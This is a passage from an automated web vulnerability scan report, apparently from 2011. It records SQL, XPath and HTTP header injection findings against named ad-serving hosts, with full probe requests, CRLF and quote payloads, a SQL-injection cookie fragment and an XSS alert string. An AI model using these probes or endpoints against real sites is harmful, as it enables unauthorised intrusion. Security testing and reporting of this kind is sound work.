Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; s_cc=true; s_sv_sid=1011730152590; mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A2.2.1%3A196.1.0%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A138.1.0%3A195.0.0%3A104.0.1%7CHCOM_US12592570'%20or%201%3d2--%20; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmb=58230453.1.10.1317600611; __utmc=58230453; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; s_sq=hotelsusprod%2Chotelsallprod%3D%2526pid%253Dsearch%252520result%252520with%252520dates%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.hotels.com%25252Fhotel%25252Fdetails.html%25253Fpa%25253D1%252526pn%25253D1%252526ps%25253D1%252526tab%25253Ddescription%252526destinationId%25253D1643195%252526hotelI%2526ot%253DA; SSRT=oQGJTgA; SSLB=1; homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/04/11//10/07/11//2//MM/dd/yy//"; user=RCoxMjQuMS4wLmkxJTNBOTcuNzMuMS5pMyUzQTk4LjYuNCUzQTEzNy4wLjAuaTIlM0ExNDUuMC4wLmkyJTNBMTA4LjEuMC5pMiUzQTE1Mi4wLjAuaTIlM0ExOTYuMS4wJTNBOTIuMC4wLmkxJTNBMTIxLjUwMy4wLmk3JTNBMTk1LjAuMCUzQTEwNC4wLjElN0NIQ09NX1VTIUEqZW5fVVN8SENPTV9VUyFFKjEwOTM2OHwwNC8xMC8yMDExfDA3LzEwLzIwMTF8MiFGKg..; SSPV=W_wAAAAAAAEAAAAAAAAAAAAAAAYAAAAAAAA

Response 2

HTTP/1.1 200 OK
Server: Apache
X-hcom-ctx: en_US|HCOM_US
Content-Language: en-US
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Expires: Sat, 26 Mar 2011 15:33:11 GMT
ntCoent-Length: 150
Expect:
Content-Type: text/html;charset=utf-8
Content-Length: 150
Pragma: no-cache
RTSS: 1
Date: Mon, 03 Oct 2011 00:29:01 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: user=QSplbl9VU3xIQ09NX1VTIUQqMTg1LjAuMC5pMToxMTQuMS4wOjEzMC4xLjEuaTI6MTAzLjQuMS5pNjoxNzEuMS4wOjQ4LjEuMDo5OC42LjQ6MTQyLjAuMC5pNDoyMDAuMC4wOjE5OC4wLjA6MTkwLjIuMDoxMzQuMC4xOjIuMi4xOjIwOS4wLjE6MTQ3LjAuMS5pNjo5Mi4wLjAuaTE6MTMyLjIuMC5pMjoxMjIuMS4wLmkzOjE0OS4wLjAuaTF8SENPTV9VUyFFKjEwOTM2OHwwNC8xMC8yMDExfDA3LzEwLzIwMTF8Mg..; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:29:01 GMT; Path=/

<span id="sense_of_urgency_close" class="blue" title="Close popup"></span>
<p>
This hotel has been booked 13 times in the last 24 hours</p>

1.23. http://www.revresda.com/event.ng/Type=click&FlightID=131794&AdID=260643&TargetID=62091&Segments=65,3522,3724,4354,4979,5788,7409,8303,8427,8773,11672,12591,22067,22782,24028,26273,27371,30359,34504,38844,38860,39489,39804,41374,41375,45767,47055,47463,48051,49210,49979,50264,50404,51152,51416,53235,57106,57111,58401,58758,58777,58865,58980,59407,59626,59629,59841,60715,61547,61548,61677,61817,62031,62093,62466,62910,63592,63927,64040&Targets=4897,9413,41261,42842,42841,62091&Values=60,80,92,101,138,194,216,264,32876,33113,33155,33227,33232,34014,34137,34581,34634,35048,35052,35065,35586,35793,35924,41054,66797,67440,68027,68032,68295,68362,68366,68375,96177,96189,103024,103078,103080,103453,103455&RawValues=NGUSERID%2Caeb2623-25195-1628532852-6&Redirect=http://www.trip.com/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.revresda.com
Path:   /event.ng/Type=click&FlightID=131794&AdID=260643&TargetID=62091&Segments=65,3522,3724,4354,4979,5788,7409,8303,8427,8773,11672,12591,22067,22782,24028,26273,27371,30359,34504,38844,38860,39489,39804,41374,41375,45767,47055,47463,48051,49210,49979,50264,50404,51152,51416,53235,57106,57111,58401,58758,58777,58865,58980,59407,59626,59629,59841,60715,61547,61548,61677,61817,62031,62093,62466,62910,63592,63927,64040&Targets=4897,9413,41261,42842,42841,62091&Values=60,80,92,101,138,194,216,264,32876,33113,33155,33227,33232,34014,34137,34581,34634,35048,35052,35065,35586,35793,35924,41054,66797,67440,68027,68032,68295,68362,68366,68375,96177,96189,103024,103078,103080,103453,103455&RawValues=NGUSERID%2Caeb2623-25195-1628532852-6&Redirect=http://www.trip.com/

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /event.ng/Type'=click&FlightID=131794&AdID=260643&TargetID=62091&Segments=65,3522,3724,4354,4979,5788,7409,8303,8427,8773,11672,12591,22067,22782,24028,26273,27371,30359,34504,38844,38860,39489,39804,41374,41375,45767,47055,47463,48051,49210,49979,50264,50404,51152,51416,53235,57106,57111,58401,58758,58777,58865,58980,59407,59626,59629,59841,60715,61547,61548,61677,61817,62031,62093,62466,62910,63592,63927,64040&Targets=4897,9413,41261,42842,42841,62091&Values=60,80,92,101,138,194,216,264,32876,33113,33155,33227,33232,34014,34137,34581,34634,35048,35052,35065,35586,35793,35924,41054,66797,67440,68027,68032,68295,68362,68366,68375,96177,96189,103024,103078,103080,103453,103455&RawValues=NGUSERID%2Caeb2623-25195-1628532852-6&Redirect=http://www.trip.com/?type=air&utm_source=orbitz&utm_medium=crpopunder&utm_content=air&utm_campaign=triplooking&cmpid=1 HTTP/1.1
Host: www.revresda.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NGUserID=aeb2623-25195-1628532852-6; NSC_xxx.sfwsfteb.dpn.80_gxe=ffffffff09e388be45525d5f4f58455e445a4a423660

Response 1

HTTP/1.1 500 Internal Server Error
Date: Mon, 03 Oct 2011 00:37:28 GMT
Server: Apache/2.2.3 (CentOS)
ntCoent-Length: 617
Connection: close
Content-Type: text/html; charset=iso-8859-1
Cache-Control: private
Content-Length: 617

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
mis
...[SNIP]...

Request 2

GET /event.ng/Type''=click&FlightID=131794&AdID=260643&TargetID=62091&Segments=65,3522,3724,4354,4979,5788,7409,8303,8427,8773,11672,12591,22067,22782,24028,26273,27371,30359,34504,38844,38860,39489,39804,41374,41375,45767,47055,47463,48051,49210,49979,50264,50404,51152,51416,53235,57106,57111,58401,58758,58777,58865,58980,59407,59626,59629,59841,60715,61547,61548,61677,61817,62031,62093,62466,62910,63592,63927,64040&Targets=4897,9413,41261,42842,42841,62091&Values=60,80,92,101,138,194,216,264,32876,33113,33155,33227,33232,34014,34137,34581,34634,35048,35052,35065,35586,35793,35924,41054,66797,67440,68027,68032,68295,68362,68366,68375,96177,96189,103024,103078,103080,103453,103455&RawValues=NGUSERID%2Caeb2623-25195-1628532852-6&Redirect=http://www.trip.com/?type=air&utm_source=orbitz&utm_medium=crpopunder&utm_content=air&utm_campaign=triplooking&cmpid=1 HTTP/1.1
Host: www.revresda.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NGUserID=aeb2623-25195-1628532852-6; NSC_xxx.sfwsfteb.dpn.80_gxe=ffffffff09e388be45525d5f4f58455e445a4a423660

Response 2

HTTP/1.1 302 Found
Date: Mon, 03 Oct 2011 00:37:28 GMT
Server: Apache/2.2.3 (CentOS)
Pragma: max-age=0
Content-Length: 0
Cache-control: no-cache
Location: http://www.trip.com/?type=air&utm_source=orbitz&utm_medium=crpopunder&utm_content=air&utm_campaign=triplooking&cmpid=1
P3P: CP="IND NON DSP UNI COM INT STA CUR PSAo PSDo IVAo IVDo OUR"
Content-Type: text/html; charset=UTF-8


1.24. http://www.revresda.com/event.ng/Type=click&FlightID=131795&AdID=260698&TargetID=63940&Segments=65,3522,3724,4354,4979,7409,8303,8773,11672,12591,22067,22782,24028,26276,27371,30286,30359,30533,34504,38844,38860,39489,39804,41374,41375,42628,45767,47055,47463,48051,49210,49979,50264,50404,51152,51416,53235,57106,57111,58401,58758,58784,58865,59407,59626,59629,59841,60715,61547,61548,61677,61817,61818,62031,62093,62139,62324,62466,62910,63590,63592,63615,63927,64040&Targets=4897,41261,42842,42841,63940&Values=60,80,92,101,138,195,216,264,32876,33113,33155,33227,33232,34014,34137,34581,34634,35048,35052,35065,35586,35793,35924,41054,66797,67440,68027,68032,68295,68362,68366,68375,96177,96189,103024,103078,103080,103453,103455&RawValues=NGUSERID%2Caeb2623-25195-1628532852-6&Redirect=http://www.trip.com/index.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.revresda.com
Path:   /event.ng/Type=click&FlightID=131795&AdID=260698&TargetID=63940&Segments=65,3522,3724,4354,4979,7409,8303,8773,11672,12591,22067,22782,24028,26276,27371,30286,30359,30533,34504,38844,38860,39489,39804,41374,41375,42628,45767,47055,47463,48051,49210,49979,50264,50404,51152,51416,53235,57106,57111,58401,58758,58784,58865,59407,59626,59629,59841,60715,61547,61548,61677,61817,61818,62031,62093,62139,62324,62466,62910,63590,63592,63615,63927,64040&Targets=4897,41261,42842,42841,63940&Values=60,80,92,101,138,195,216,264,32876,33113,33155,33227,33232,34014,34137,34581,34634,35048,35052,35065,35586,35793,35924,41054,66797,67440,68027,68032,68295,68362,68366,68375,96177,96189,103024,103078,103080,103453,103455&RawValues=NGUSERID%2Caeb2623-25195-1628532852-6&Redirect=http://www.trip.com/index.html

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /event.ng/Type'=click&FlightID=131795&AdID=260698&TargetID=63940&Segments=65,3522,3724,4354,4979,7409,8303,8773,11672,12591,22067,22782,24028,26276,27371,30286,30359,30533,34504,38844,38860,39489,39804,41374,41375,42628,45767,47055,47463,48051,49210,49979,50264,50404,51152,51416,53235,57106,57111,58401,58758,58784,58865,59407,59626,59629,59841,60715,61547,61548,61677,61817,61818,62031,62093,62139,62324,62466,62910,63590,63592,63615,63927,64040&Targets=4897,41261,42842,42841,63940&Values=60,80,92,101,138,195,216,264,32876,33113,33155,33227,33232,34014,34137,34581,34634,35048,35052,35065,35586,35793,35924,41054,66797,67440,68027,68032,68295,68362,68366,68375,96177,96189,103024,103078,103080,103453,103455&RawValues=NGUSERID%2Caeb2623-25195-1628532852-6&Redirect=http://www.trip.com/index.html?type=air&utm_source=orbitz&utm_medium=crpopunder&utm_content=air&utm_campaign=triplooking&cmpid=1 HTTP/1.1
Host: www.revresda.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NGUserID=aeb2623-25195-1628532852-6; NSC_xxx.sfwsfteb.dpn.80_gxe=ffffffff09e388be45525d5f4f58455e445a4a423660

Response 1

HTTP/1.1 500 Internal Server Error
Date: Mon, 03 Oct 2011 00:37:26 GMT
Server: Apache/2.2.3 (CentOS)
ntCoent-Length: 617
Connection: close
Content-Type: text/html; charset=iso-8859-1
Cache-Control: private
Content-Length: 617

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
mis
...[SNIP]...

Request 2

GET /event.ng/Type''=click&FlightID=131795&AdID=260698&TargetID=63940&Segments=65,3522,3724,4354,4979,7409,8303,8773,11672,12591,22067,22782,24028,26276,27371,30286,30359,30533,34504,38844,38860,39489,39804,41374,41375,42628,45767,47055,47463,48051,49210,49979,50264,50404,51152,51416,53235,57106,57111,58401,58758,58784,58865,59407,59626,59629,59841,60715,61547,61548,61677,61817,61818,62031,62093,62139,62324,62466,62910,63590,63592,63615,63927,64040&Targets=4897,41261,42842,42841,63940&Values=60,80,92,101,138,195,216,264,32876,33113,33155,33227,33232,34014,34137,34581,34634,35048,35052,35065,35586,35793,35924,41054,66797,67440,68027,68032,68295,68362,68366,68375,96177,96189,103024,103078,103080,103453,103455&RawValues=NGUSERID%2Caeb2623-25195-1628532852-6&Redirect=http://www.trip.com/index.html?type=air&utm_source=orbitz&utm_medium=crpopunder&utm_content=air&utm_campaign=triplooking&cmpid=1 HTTP/1.1
Host: www.revresda.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NGUserID=aeb2623-25195-1628532852-6; NSC_xxx.sfwsfteb.dpn.80_gxe=ffffffff09e388be45525d5f4f58455e445a4a423660

Response 2

HTTP/1.1 302 Found
Date: Mon, 03 Oct 2011 00:37:27 GMT
Server: Apache/2.2.3 (CentOS)
Pragma: max-age=0
Content-Length: 0
Cache-control: no-cache
Location: http://www.trip.com/index.html?type=air&utm_source=orbitz&utm_medium=crpopunder&utm_content=air&utm_campaign=triplooking&cmpid=1
P3P: CP="IND NON DSP UNI COM INT STA CUR PSAo PSDo IVAo IVDo OUR"
Content-Type: text/html; charset=UTF-8


2. XPath injection

Summary

Severity:   High
Confidence:   Firm
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7743/12359/21900-15.js

Issue detail

The put_2101 cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the put_2101 cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Issue background

XPath injection vulnerabilities arise when user-controllable data is incorporated into XPath queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Depending on the purpose for which the vulnerable query is being used, an attacker may be able to exploit an XPath injection flaw to read sensitive application data or interfere with application logic.

Issue remediation

User input should be strictly validated before being incorporated into XPath queries. In most cases, it will be appropriate to accept input containing only short alphanumeric strings. At the very least, input containing any XPath metacharacters such as " ' / @ = * [ ] ( and ) should be rejected.

Request

GET /a/7743/12359/21900-15.js?cb=0.14229151024483144 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.goal.com/en/news/9/england/2011/10/01/2691360/anderson-confident-manchester-united-will-keep-unbeaten-run
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; au=GSAE3LG5-KKTN-10.208.77.156; put_1185=2944787775510337379; put_2101=e406aef0-9c85-4e03-b34a-8a4ca0074db1'; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2081=OO-00000000000000000; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1197=3620501663059719663; rpb=4940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%267935%3D1%266643%3D1%264212%3D1%266286%3D1%265852%3D1%266432%3D1%267727%3D1%264210%3D1%265671%3D1%264554%3D1%266073%3D1; put_2100=usr3fe3ac8db403a568; ruid=154e62c97432177b6a4bcd01^9^1317599333^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; cd=false; lm="2 Oct 2011 23:50:10 GMT"; ses8=13209^1; csi8=3226247.js^1^1317599462^1317599462; csi2=3188003.js^2^1317599406^1317599882&3192060.js^2^1317595852^1317596179&3185947.js^1^1317595852^1317595852; ses15=13378^2&13209^3&12566^2&12359^1; csi15=3226249.js^3^1317599341^1317599886&3188004.js^2^1317599406^1317599881&2748761.js^1^1317599431^1317599431&3209195.js^2^1317595891^1317598688; ses1=13209^5; csi1=3226243.js^1^1317599890^1317599890&3226929.js^2^1317599456^1317599882&3226251.js^2^1317599333^1317599350; rdk9=0; ses9=12359^1; csi9=3154654.js^1^1317599933^1317599933; rdk=7743/12359; rdk2=0; ses2=13378^2&12566^2&12359^1

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:00:29 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7743/12359; expires=Mon, 03-Oct-2011 01:00:29 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=0; expires=Mon, 03-Oct-2011 01:00:29 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=13378^2&13209^3&12566^2&12359^68; expires=Tue, 04-Oct-2011 04:59:59 GMT; max-age=115170; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 3348

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3182366"
...[SNIP]...
et/adi/N6054.Invitemedia.com/B5912738.28;sz=300x250;pc=[TPAS_ID];click=http://g.ca.bid.invitemedia.com/pixel?returnType=redirect&key=Click&message=eJwdjDsOhDAMBa.CXG8kEjv.7G1iCBWio1rt3bGpPCM9zw8Q4buYUrXPAthCVDo1Dash4OtwZrNCm4xCenixbVjZlX2XOetsDvmaY.ltlbTsZLDHRX5rFHjd5xnIgbUTivwfI_ccIA--&redirectURL=;ord=b0ab6699-4c7a-48fb-9ca9-d86bd7ee1e2b?\" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSP
...[SNIP]...

3. HTTP header injection
There are 2 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


3.1. http://ad.doubleclick.net/getcamphist [src parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /getcamphist

Issue detail

The value of the src request parameter is copied into the Location response header. The payload 941ce%0d%0af56167da7a4 was submitted in the src parameter. This caused a response containing an injected HTTP header.

Request

GET /getcamphist;src=1517119;host=nike.112.2o7.net%2Fb%2Fss%2Fnikefootballglobal%2Cnikeall%2F1%2FH.22.1%2Fs93092863939236%3FAQB%3D1%26vvpr%3Dtrue%26%26pccr%3Dtrue%26vidn%3D27447D5405012A65-6000010FA00F4A54%26%26ndh%3D1%26t%3D2%252F9%252F2011%252018%253A58%253A28%25200%2520300%26vmt%3D4DCC71DA%26vmf%3Dnike.112.2o7.net%26ce%3DUTF-8%26ns%3Dnike%26pageName%3DGLSC%253Elang_selector%253Emain%26g%3Dhttp%253A%252F%252Fwww.nike.com%252Fnikeos%252Fp%252Fnikefootball%252Flanguage_tunnel%253Flid%253Dnikebutton%26r%3Dhttp%253A%252F%252Fwww.manutd.com%252FSearch-Results.aspx%253Fqs%253Dmanutd_frontend%2526catTxt%253D%2526searchText%253Dxss75931%25253Cscript%25253Ealert%28document.location%29%25253C%252Fscript%25253E14fb8fbf954%26vvp%3DDFA%25231517119%253Av49%253D%255B%255B%2522DFA-%2522%252Blis%252B%2522-%2522%252Blip%252B%2522-%2522%252Blastimp%252B%2522-%2522%252Blastimptime%252B%2522-%2522%252Blcs%252B%2522-%2522%252Blcp%252B%2522-%2522%252Blastclk%252B%2522-%2522%252Blastclktime%255D%255D%26ch%3Dsoccer%26server%3Dnikefootballglobal%26events%3Devent13%26v5%3DD%253DUser-Agent%26c18%3Dlanguage_selector%26c24%3DD%253DUser-Agent%26c26%3DD%253Dg%26v48%3DD%253DpageName%26s%3D1920x1200%26c%3D16%26j%3D1.6%26v%3DY%26k%3DY%26bw%3D1074%26bh%3D906%26p%3DShockwave%2520Flash%253BQuickTime%2520Plug-in%25207.7%253BJava%2520Deployment%2520Toolkit%25206.0.260.3%253BJava%28TM%29%2520Platform%2520SE%25206%2520U26%253BSilverlight%2520Plug-In%253BMicrosoft%2520Office%25202010%253BRemoting%2520Viewer%253BNative%2520Client%253BChrome%2520PDF%2520Viewer%253BGoogle%2520Earth%2520Plugin%253BGoogle%2520Updater%253BGoogle%2520Update%253BiTunes%2520Application%2520Detector%253BWPI%2520Detector%25201.4%253BDefault%2520Plug-in%253B%26AQE%3D1941ce%0d%0af56167da7a4&A2S=1;ord=1732731727 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.nike.com/nikeos/p/nikefootball/language_tunnel?lid=nikebutton
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://nike.112.2o7.net/b/ss/nikefootballglobal,nikeall/1/H.22.1/s93092863939236?AQB=1&vvpr=true&&pccr=true&vidn=27447D5405012A65-6000010FA00F4A54&&ndh=1&t=2%2F9%2F2011%2018%3A58%3A28%200%20300&vmt=4DCC71DA&vmf=nike.112.2o7.net&ce=UTF-8&ns=nike&pageName=GLSC%3Elang_selector%3Emain&g=http%3A%2F%2Fwww.nike.com%2Fnikeos%2Fp%2Fnikefootball%2Flanguage_tunnel%3Flid%3Dnikebutton&r=http%3A%2F%2Fwww.manutd.com%2FSearch-Results.aspx%3Fqs%3Dmanutd_frontend%26catTxt%3D%26searchText%3Dxss75931%253Cscript%253Ealert(document.location)%253C%2Fscript%253E14fb8fbf954&vvp=DFA%231517119%3Av49%3D%5B%5B%22DFA-%22%2Blis%2B%22-%22%2Blip%2B%22-%22%2Blastimp%2B%22-%22%2Blastimptime%2B%22-%22%2Blcs%2B%22-%22%2Blcp%2B%22-%22%2Blastclk%2B%22-%22%2Blastclktime%5D%5D&ch=soccer&server=nikefootballglobal&events=event13&v5=D%3DUser-Agent&c18=language_selector&c24=D%3DUser-Agent&c26=D%3Dg&v48=D%3DpageName&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1074&bh=906&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava(TM)%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BRemoting%20Viewer%3BNative%20Client%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&AQE=1941ce
f56167da7a4
&A2S=1/respcamphist;src=1517119;ec=nh;rch=2;lastimp=0;lastimptime=0;lis=0;lip=0;lic=0;lir=0;lirv=0;likv=0;lipn=;lastclk=0;lastclktime=0;lcs=0;lcp=0;lcc=0;lcr=0;lcrv=0;lckv=0;lcpn=;ord=1317599960:
Date: Sun, 02 Oct 2011 23:59:20 GMT
Server: GFE/2.0
Content-Type: text/html


3.2. http://kantarmedia.guardian.co.uk/RealMedia/ads/adstream.cap [476949646137654800&c parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://kantarmedia.guardian.co.uk
Path:   /RealMedia/ads/adstream.cap

Issue detail

The value of the 476949646137654800&c request parameter is copied into the Set-Cookie response header. The payload 958bb%0d%0aa655d8051a4 was submitted in the 476949646137654800&c parameter. This caused a response containing an injected HTTP header.

Request

GET /RealMedia/ads/adstream.cap?476949646137654800&c=958bb%0d%0aa655d8051a4&e=14d HTTP/1.1
Host: kantarmedia.guardian.co.uk
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://panel.kantarmedia.com/0/KantarMedia-Panel/panel/set_panel.html?054612530__!__http://kantarmedia.guardian.co.uk__!__&Paneled_Site=guardian.co.uk&Paneled_Section=football
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GU_LOCATION=dXNhOjU6dnQ6NTpzdG93ZTo1OjUyMzpicm9hZGJhbmQ6IDQ0LjUwMDotNzIuNjQ2QDg2MjQxMTYzMTY1MzMyMzU2NTEwMjIxMTk2MjQ0MjAyMTgxNzExNjk3; s_pers=%20s_lv%3D1317599402360%7C1412207402360%3B%20s_lv_s%3DFirst%2520Visit%7C1317601202360%3B%20s_visit%3D1%7C1317601202363%3B%20c_dl%3D1%7C1317601202366%3B%20s_ev36_persist%3DDirect%2520Load%7C1318204202383%3B%20s_37_persist%3DDirect%2520Load%7C1318204202395%3B%20s_ev40%3D%255B%255B'Direct%252520Load'%252C'1317599402404'%255D%255D%7C1475452202404%3B%20gpv_pageName%3DManchester%2520United%253AKeyword%2520Page%253A589863%7C1317601202406%3B%20s_nr%3D1317599402415-New%7C1349135402415%3B; s_sess=%20s_cc%3Dtrue%3B%20c_m%3DundefinedDirect%2520LoadDirect%2520Load%3B%20s_sq%3D%3B; s_vi=[CS]v1|27447C5685010C0B-4000010320138FC1[CE]; OAX=Mhd7ak6I+K0ABUJY

Response

HTTP/1.1 302 Found
Date: Sun, 02 Oct 2011 23:52:08 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Set-Cookie: 958bb
a655d8051a4
=0; expires=Sun, 16-Oct-11 23:52:08 GMT; path=/; domain=.guardian.co.uk
Location: /RealMedia/ads/Creatives/default/empty.gif
Connection: close
Content-Length: 0
Content-Type: text/plain


4. Cross-site scripting (reflected)
There are 435 instances of this issue:

Issue background

